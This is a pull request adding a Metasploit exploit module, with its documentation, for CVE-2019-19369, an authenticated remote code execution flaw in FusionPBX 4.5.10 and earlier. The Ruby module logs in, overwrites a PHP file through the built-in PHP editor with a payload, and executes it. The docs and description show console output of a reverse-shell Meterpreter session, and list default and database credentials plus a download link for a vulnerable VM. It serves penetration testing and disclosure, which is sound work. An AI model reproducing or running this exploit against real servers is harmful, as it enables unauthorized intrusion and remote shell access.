### PR TITLE
Add CVE-2019-19369 FusionPBX 4.5.10 exploit

### DIFF
--- a/documentation/modules/exploit/linux/http/fusionpbx_php_editor_cmd_exec.md
+++ b/documentation/modules/exploit/linux/http/fusionpbx_php_editor_cmd_exec.md
@@ -1,0 +1,61 @@
+## Vulnerable Application
+CVE-2019-19369
+1. [Vendor site](https://fusionpbx.com/)
+### Creating A Testing Environment
+The vendor has patched this issue. I have kept a copy of the version for demo purposes:
+https://mega.nz/#!yiRigCAI!9Qt2g3wrQy3oLHAjf8uN2sz6dWkuhd4QV-G8G1FGv4k
+
+Download the OVF from the link provided and import OVF.
+
+Username: root<br>
+Password: fusion
+
+Database Password: bckfRgOxcFitVIsPRKVlmuvjfU
+
+
+```
+1. login as root on machine
+2. cd /etc/fusionpbx
+3. mv config.php config1.php
+4. on web browser, visit https://ip/
+5. set new admin password on the web ui prompt
+6. on the next page insert database password into the database configuration 
+7. submit and exploit
+```
+
+## Verification
+
+Do:
+```
+    use exploit/linux/http/fusionpbx_php_editor_cmd_exec
+    set RHOST target_ip
+    set RPORT 443
+    set SSL true
+    set USERNAME login_username
+    set PASSWORD login_password
+    exploit
+```
+
+## Scenario
+```
+root@TheCyberGeek:~/# msfconsole
+msf5 > use exploit/linux/http/fusionpbx_php_editor_cmd_exec
+msf5 exploit(linux/http/fusionpbx_php_editor_cmd_exec) > set RHOST 192.168.0.48
+msf5 exploit(linux/http/fusionpbx_php_editor_cmd_exec) > set RPORT 443
+msf5 exploit(linux/http/fusionpbx_php_editor_cmd_exec) > set SSL true
+msf5 exploit(linux/http/fusionpbx_php_editor_cmd_exec) > set USERNAME admin
+msf5 exploit(linux/http/fusionpbx_php_editor_cmd_exec) > set PASSWORD fusion
+msf5 exploit(linux/http/fusionpbx_php_editor_cmd_exec) > exploit
+msf5 exploit(linux/http/fusionpbx_php_editor_cmd_exec) > run
+[*] Started reverse TCP handler on 192.168.0.12:4444 
+[+] Login Successful!
+[*] 192.168.0.48:443 - Sending PHP payload (/var/www/fusionpbx/project_root.php)
+[+] Uploaded Successfully!
+[*] 192.168.0.48:443 - Executing project_root.php...
+[*] Sending stage (38288 bytes) to 192.168.0.48
+[*] Meterpreter session 2 opened (192.168.0.12:4444 -> 192.168.0.48:51374) at 2020-01-20 07:22:05 +0000
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > 
+```
+

--- a/modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
+++ b/modules/exploits/linux/http/fusionpbx_php_editor_cmd_exec.rb
@@ -1,0 +1,135 @@
+####################################################################
+# This module requires Metasploit: https://metasploit.com/download #
+#  Current source: https://github.com/rapid7/metasploit-framework  #
+####################################################################
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+        "Name" => "FusionPBX =< 4.5.10 Authenticated Remote Code Execution",
+        "Description" =>  %q{
+          Authenticated Remote Code Execution in FusionPBX web appliances.
+          Affected versions: =< 4.5.10
+          By using the on site PHP-Editor function users can overwrite PHP files on the web server
+          with a trojan horse and get a shell as www-data by navigating to the changed PHP file location.
+          Vendor verified: 11/27/2019
+          Vendor patched: 12/09/2019
+          Public disclosure: 01/20/2020
+        },
+        "License" => MSF_LICENSE,
+        'Author' => [
+          'enjloezz', # Metasploit Module
+          'TheCyberGeek' # Discovery and Metasploit Module
+        ],
+        'References' =>
+        [
+            ['URL','https://github.com/fusionpbx/fusionpbx/releases'],
+            ['CVE','2019-19369']
+        ],
+        "Platform"	=> "php",
+        "Arch"		=> ARCH_PHP,
+        "Targets" => [
+          ["FusionPBX", {}],
+        ],
+        "Stance" => Msf::Exploit::Stance::Aggressive,
+        "Privileged" => false,
+        "DisclosureDate" => "Jan 21 2020",
+        "DefaultTarget" => 0
+      ))
+    register_options(
+      [
+        OptString.new("TARGETURI", [true, "The URI of the FusionPBX Application", "/"]),
+        OptString.new("USERNAME", [true, "The Username of the FusionPBX Application", "admin"]),
+        OptString.new("PASSWORD", [true, "The Password of the FusionPBX Application", "fusion"]),
+      ]
+    )
+  end
+
+  def exploit
+    begin
+      res = send_request_cgi(
+        "uri" => normalize_uri(target_uri.path, "login.php"),
+        "method" => "GET",
+      )
+      if res && res.code == 200
+        @phpsessid = res.get_cookies
+        /token\".*value=\"(?<token>.*?)\"/ =~ res.body
+        res = send_request_cgi!(
+          "uri" => normalize_uri(target_uri.path, "/core/user_settings/user_dashboard.php"),
+          "method" => "POST",
+          "cookie" => @phpsessid,
+          "vars_post" => {
+            "username" => datastore["USERNAME"],
+            "password" => datastore["PASSWORD"],
+          },
+        )
+        if res.body.include? "href='/logout.php'"
+          print_good("Login Successful!")
+          upload
+        else
+          vprint_error("Cannot login to FusionPBX")
+        end
+      else
+        vprint_error("Couldn't get token, check your TARGETURI")
+      end
+    rescue ::Rex::ConnectionError
+      vprint_error("Connection error...")
+    end
+  end
+
+  def upload
+    res = send_request_cgi({
+      "uri" => normalize_uri(target_uri.path, "/app/edit/index.php"),
+      "vars_get" => {
+         "dir"   => "php"
+      },
+      "method" => "GET",
+      "cookie" => @phpsessid
+      },
+    )
+    /id=\'token\'.*value=\'(?<token>.*?)\'/ =~ res.body
+    payload_name = '/var/www/fusionpbx/project_root.php'
+    boundary = Rex::Text.rand_text_hex(16)
+    post_data =  "------#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"filepath\"\r\n\r\n"
+    post_data << "#{payload_name}\r\n"
+    post_data << "------#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"content\"\r\n\r\n"
+    post_data << "#{payload.encoded}\r\n"
+    post_data << "------#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"token\"\r\n\r\n"
+    post_data << "#{token}\r\n"
+    post_data << "------#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"mode\"\r\n\r\n"
+    post_data << "php\r\n"
+    post_data << "------#{boundary}--\r\n"
+    print_status("#{peer} - Sending PHP payload (#{payload_name})")
+    res = send_request_cgi({
+      'method'	=> 'POST',
+      'uri'		=> normalize_uri(target_uri, "/app/edit/file_save.php"),
+      'cookie'	=> @phpsessid,
+      'ctype'	=> "multipart/form-data; boundary=----#{boundary}",
+      'data'	=> post_data
+      },
+    )
+    if res.code == 200
+      print_good("Uploaded Successfully!")
+      exec
+    end
+  end
+
+  def exec
+    fname = "project_root.php"
+    print_status("#{peer} - Executing #{fname}...")
+    res = send_request_cgi({
+      'uri'    => normalize_uri(target_uri.path, "/project_root.php")
+    })
+    if res and res.code == 404
+      fail_with(Failure::NotFound, "#{peer} - Not found: #{@fname}")
+    end
+  end
+end


### PR DESCRIPTION
Add CVE-2019-19369 FusionPBX 4.5.10 exploit.

```
CVE-2019-19369
FusionPBX =< 4.5.10 Authenticated Remote Code Execution.
This module exploits FusionPBX versions =< 4.5.10 by abusing 
the PHP-Editor function, authenticated attackers can replace PHP
scripts with a trojan horse and can execute by visiting the changed file.

Tested on: 
Ubuntu 18.04
```
Verification

Do:
```
    use exploit/linux/http/fusionpbx_php_editor_cmd_exec
    set RHOST target_ip
    set RPORT 443
    set SSL true
    set USERNAME login_username
    set PASSWORD login_password
    exploit
```
```
root@TheCyberGeek:~/# msfconsole
msf5 > use exploit/linux/http/fusionpbx_php_editor_cmd_exec
msf5 exploit(linux/http/fusionpbx_php_editor_cmd_exec) > set RHOST 192.168.0.48
msf5 exploit(linux/http/fusionpbx_php_editor_cmd_exec) > set RPORT 443
msf5 exploit(linux/http/fusionpbx_php_editor_cmd_exec) > set SSL true
msf5 exploit(linux/http/fusionpbx_php_editor_cmd_exec) > set USERNAME admin
msf5 exploit(linux/http/fusionpbx_php_editor_cmd_exec) > set PASSWORD fusion
msf5 exploit(linux/http/fusionpbx_php_editor_cmd_exec) > exploit
msf5 exploit(linux/http/fusionpbx_php_editor_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.0.12:4444 
[+] Login Successful!
[*] 192.168.0.48:443 - Sending PHP payload (/var/www/fusionpbx/project_root.php)
[+] Uploaded Successfully!
[*] 192.168.0.48:443 - Executing project_root.php...
[*] Sending stage (38288 bytes) to 192.168.0.48
[*] Meterpreter session 2 opened (192.168.0.12:4444 -> 192.168.0.48:51374) at 2020-01-20 07:22:05 +0000

meterpreter > getuid
Server username: www-data (33)
meterpreter > 

```